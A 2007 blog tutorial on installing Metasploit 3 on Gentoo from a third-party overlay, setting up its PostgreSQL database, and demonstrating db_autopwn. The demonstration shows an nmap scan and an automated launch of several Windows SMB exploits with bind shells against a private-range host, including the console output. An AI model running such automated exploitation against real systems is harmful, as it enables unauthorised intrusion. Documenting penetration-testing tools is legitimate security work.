metasploit3 on gentoo

bored of waiting for metasploit3 to hit portage? download metasploit3-ebuild.tgz and unpack it into a portage overlay directory... if you do layman, or your own thing, then these next few commands probably are not for you, if not, they'll do: 



mkdir -p /usr/local/portage/netdotnet.net
cd /usr/local/portage/netdotnet.net
wget http://www.netdotnet.net/assets/18/metasploit3-ebuild.tgz
tar zxvf metasploit3-ebuild.tgz
rm metasploit3-ebuild.tgz
echo "PORTDIR_OVERLAY=\"`pwd`\"" >> /etc/make.conf
cd

then emerge the packages, do read the output of emerge -av 



echo "net-analyzer/metasploit gtk postgres sqlite3" >> /etc/portage/package.use
ACCEPT_KEYWORDS="~x86" emerge -av postgresql '=rails-1.2.2' '=metasploit-3.0'

you should see something like the following from the above: 



These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild   R   ] dev-db/postgresql-8.2.4-r1  USE="nls pam perl python readline ssl xml zlib -doc 
-kerberos -pg-intdatetime (-selinux) -tcl -test" 0 kB 
[ebuild   R   ] dev-ruby/rails-1.2.2  USE="-doc -fastcgi -mysql -postgres -sqlite -sqlite3" 0 kB 
[ebuild   Rf  ] net-analyzer/metasploit-3.0  USE="gtk postgres sqlite3 -httpd -sqlite2" 0 kB [1] 

Total: 3 packages (3 reinstalls), Size of downloads: 0 kB
Fetch Restriction: 1 package
Portage overlays:
 [1] /usr/local/portage/netdotnet.net

Would you like to merge these packages? [Yes/No]

yours should say [ebuild N ] instead, important is that you get the ref to your portage overlay, if thats cool, hit enter... you will be forced to jump thru hoops to get the package ( go to http url in browser, click 'i agree', grab file, copy file inplace, rehit emerge for metasploit, GRR... ), but if all goes well, become your usual non-root user, eg: 



su - luser

and initate your database malarky as this non-root user: 



initdb /home/luser/metasploit3
pg_ctl -D /home/luser/metasploit3 -l /home/luser/metasploit3.log start

become root again and do the following at the msf prompt: 



gentoo ~ # msfconsole3 

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ msf v3.0
+ -- --=[ 176 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 30 aux

msf > load db_postgres
[*] Successfully loaded plugin: db_postgres
msf > createuser -U luser -P
[*] Executing: `createuser -U luser -P`

Enter name of role to add: root
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) y
CREATE ROLE
msf > db_create
CREATE DATABASE
ERROR:  table "hosts" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE / UNIQUE will create implicit index "hosts_address_key" for table "hosts"
ERROR:  table "services" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
ERROR:  table "vulns" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
ERROR:  table "refs" does not exist
NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
ERROR:  table "vulns_refs" does not exist
[*] Database creation complete (check for errors)
msf > db_hosts
msf > db_nmap -p 445 192.168.10.2 

Starting Nmap 4.20 ( http://insecure.org ) at 2007-09-04 04:32 BST
Interesting ports on 192.168.10.2:
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap finished: 1 IP address (1 host up) scanned in 0.266 seconds
msf > db_services
[*] Service: host=192.168.10.2 port=445 proto=tcp state=up name=microsoft-ds
msf > db_autopwn 
[*] Usage: db_autopwn [options]
        -h         Display this help text
        -t         Show all matching exploit modules
        -x         Select modules based on vulnerability references
        -p         Select modules based on open ports
        -e         Launch exploits against all matched targets
         Only obtain a single shell per target system (NON-FUNCTIONAL)
        -r         Use a reverse connect shell
        -b         Use a bind shell on a random port
        -I [range] Only exploit hosts inside this range
        -X [range] Always exclude hosts inside this range

msf > db_autopwn -e
msf > db_autopwn -p -e
[*] Launching exploit/windows/smb/ms03_049_netapi (1/12) against 192.168.10.2:445...
[*] Started bind handler
[*] Launching exploit/windows/smb/ms05_039_pnp (4/12) against 192.168.10.2:445...
[*] Launching exploit/windows/smb/ms04_031_netdde (5/12) against 192.168.10.2:445...
[*] Connecting to the SMB service...
[*] Started bind handler
[*] Started bind handler
[*] Launching auxiliary/dos/windows/smb/ms05_047_pnp (7/12) against 192.168.10.2:445...
[*]  >> Exception during launch from auxiliary/dos/windows/smb/ms05_047_pnp: A target has not been selected.
[*] Launching exploit/windows/smb/ms06_040_netapi (8/12) against 192.168.10.2:445...
[*] Started bind handler
[*] Launching exploit/windows/smb/ms04_011_lsass (9/12) against 192.168.10.2:445...
[*] Started bind handler
msf > [*] Binding to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.10.2[\BROWSER] ...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.10.2[\browser] ...
[*] Trying target Windows 2000 SP4...
[*] Binding to 2f5f3220-c126-1076-b549-074d078619da:1.2@ncacn_np:192.168.10.2[\nddeapi]
[*] No target detected for Unix/Samba 3.0.24...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.10.2[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.10.2[\lsarpc]...
[*] Getting OS information...
[*] No target is available for Unix

msf >

if things don't go as above, please consider that the above was emerged against a portage tree synced yesterday. if you still feel i have missed something important, please contact me via the link at the top, and i will amend this page.

Posted by doug on Tuesday, September 04, 2007